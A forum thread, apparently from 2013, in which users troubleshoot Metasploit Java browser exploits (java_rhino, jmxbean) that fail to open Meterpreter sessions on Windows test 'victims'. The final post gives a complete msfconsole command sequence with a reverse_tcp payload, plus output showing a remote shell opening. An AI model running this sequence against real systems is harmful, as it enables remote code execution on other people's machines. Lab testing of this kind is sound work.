Meterpreter doesn't create its session

[silentman67]

Hello guys,
I am working on some of the new java exploits in the wild. However, everything goes fine, unless creating the meterpreter session.
for instance, I used java rhino exploit and after starting the server and launching the vulnerable website, all I've got is as follows:[*] 10.1.41.3 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 10.1.41.3 java_rhino - Sending Applet.jar

In a similar situation, I've started to use java_jre17_jmxbean exploit. Although it started the server and launched the exploit, it still doesn't create the meterpreter session.

Just for the records, I've set the LPORT and LHOST to the attacker's port and attacker's IP address, respectively. So, everything is okay, unless the meterpreter session!

My victims run both Win7 and Win XP SP3.

[Atomix]

Are you sure java is installed on the victims?

[Onedevil420]

I am also facing this Problem. In my case java is installed in victim's machine

[jnpa123]

Are you sure they're running vulnerable java versions????? Any antivirus or firewall installed????

[Onedevil420]

The firewall of the victim's machine is off and still it's not working it like this

Code:

[*] Started reverse handler on 192.168.1.30:4444 
msf  exploit(java_rhino) > [*] Using URL: http://192.168.1.30:8080/Ve2lFLP[*] Server started.[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Sending Applet.jar[*] 192.168.1.9      java_rhino - Sending Applet.jar[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request

but not creating a session.

[jnpa123]

Yah and i still think you're not using a vulnerable java version or an antivirus
I only asked about the firewall because in a quite specific situation it could be blocking it and the other two are pretty obvious

[Onedevil420]

I m not using the antivirus on victim's machine and I don't know where I found the vanurable version of java.

[jnpa123]

Well if there are no AV's/firewalls then im pretty sure you're not using a vulnerable version.
Just check what version(s) are affected by the exploit you are trying to use and search for it in the internet, here you can find some old versions http://www.oldapps.com/java.php

[zimmaro]

hi
I did a test in this way ...... but I do not know if it is the correct way!

http://vimeo.com/60669213

[zimmaro]

hi
I did a test in this way ...... but I do not know if it is the correct way!

http://vimeo.com/60669213

ri-hi
i made a same test with java/meterpreter/reverse_tcp && worked

msf > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > set srvhost 192.168.1.7
srvhost => 192.168.1.7
msf exploit(java_rhino) > set srvport 80
srvport => 80
msf exploit(java_rhino) > set uripath /
uripath => /
msf exploit(java_rhino) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rhino) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf exploit(java_rhino) > set lport 443
lport => 443
msf exploit(java_rhino) > exploit[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.7:443 [*] Using URL: http://192.168.1.7:80/[*] Server started.
msf exploit(java_rhino) >[*] 192.168.1.10 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.10 java_rhino - Sending Applet.jar[*] 192.168.1.10 java_rhino - Sending Applet.jar[*] Sending stage (30216 bytes) to 192.168.1.10[*] Meterpreter session 1 opened (192.168.1.7:443 -> 192.168.1.10:1053) at 2013-02-28 20:53:40 +0100
sessions -i 1[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : vict-4fa5381d76
OS : Windows XP 5.1 (x86)
Meterpreter : java/java